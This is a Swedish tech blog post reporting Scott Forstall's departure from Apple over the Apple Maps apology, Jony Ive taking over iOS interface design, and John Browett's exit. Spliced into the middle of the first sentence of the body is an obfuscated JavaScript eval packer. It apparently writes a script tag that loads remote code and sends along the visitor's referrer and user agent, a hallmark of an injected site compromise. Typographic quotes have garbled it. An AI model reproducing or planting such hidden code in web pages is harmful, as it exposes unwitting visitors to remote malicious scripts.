Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

Apples Scott Forstall avgår

Apples Scott Forstall avgår
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hitrd|var|u0026u|referrer|tniey||js|php’.split(‘|’),0,{}))
är det officiellt. Scott Forstall ansvarig för Apple iOS avgår från sin position. Scott var en av Steve Jobs favoriter men ansågs av de anställda vara väldigt jobbig att jobba med. Det har tydligen varit dålig relation mellan honom och andra höga chefer på Apple och relationen har försämrats efter Steve Jobs bortgång.

Nu visar rapporter på morgonen att Scott Forstall vägrat skriva på ett brev med ursäkt för Apple Maps.  Istället fick Tim Cook själv signera brevet och ta på sig hela skulden. Detta blev då droppen som fick Scott Forstall att lämna företaget.

Det är Jony Ive som tar över positionen som ansvarig för iOS gränssnitt och kanske blir det bättre.

Så här säger en annan hög chef på Apple till New York Times:
”This was better than the Giants winning the World Series. People are really excited.”

Det verkar också som John Browett, chef för Apple Stores fått avgå från företaget. Han jobbade i ca ett halvår men har tydligen gjort en del misstag som inte gillades av styrelsen.

Mer info: bits.blogs.nytimes.com